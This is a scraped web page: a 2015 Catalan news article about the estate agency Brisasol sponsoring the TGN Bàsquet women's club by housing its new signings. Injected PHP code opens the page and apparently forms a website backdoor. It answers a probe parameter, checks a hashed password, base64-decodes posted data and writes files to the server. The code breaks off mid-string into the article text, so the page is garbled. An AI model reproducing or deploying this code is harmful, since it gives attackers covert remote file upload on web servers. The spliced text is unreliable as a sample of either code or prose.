function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Brisasol dóna suport al projecte basquetbolístic del TGN Bàsquet - Tgn Bàsquet Club -

Brisasol dóna suport al projecte basquetbolístic del TGN Bàsquet

By
Updated: octubre 14, 2015

La immobiliària Brisasol i el TGN Bàsquet han tancat un acord de col·laboració en el marc del nou projecte basquetbolístic del club lila. Així, l’empresa cedirà un dels seus pisos per allotjar els nous fitxatges d’enguany, Analía Casado i la nord-americana Olivia Fouty durant aquesta temporada. “Estem molt satisfets amb aquest acord que ens permet iniciar una línia de col·laboració amb Brisasol. El seu suport al nostre projecte ens permet estalviar uns diners en una temporada en què hem fet un salt important, tot jugant per primera vegada a Copa Catalunya Femenina”, explica Josep Maria Adam, president del TGN Bàsquet.

Per la seva banda, Gil Cristià, president de Brisasol, també va mostrar la seva satisfacció en virtut de l’acord amb l’entitat lila: “Hem cregut oportú donar suport a aquest projecte que representa una empenta a l’esport femení, i per una cultura d’igualtat d’oportunitats”.

Brisasol és una empresa familiar amb gairebé 60 anys d’història, líder en el sector immobiliari a Tarragona. Ofereix serveis de compra-venda i lloguer de pisos i locals, administració de comunitats de propietaris, administració de patrimoni i assegurances. L’empresa té 11 oficines per tota la provincia, incloent-hi Tarragona capital. “Brisasol té un compromís social amb Tarragona, un compromís que volem incrementar amb accions com aquesta, de suport a l’esport i al teixit associatiu de la ciutat”, assegura Gil Cristià.

“Que una empresa com Brisasol hagi decidit estar al nostre costat significa que la gent confia en allò que fem, en el nostre projecte. Continuarem treballant”, diu Josep Maria Adam.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *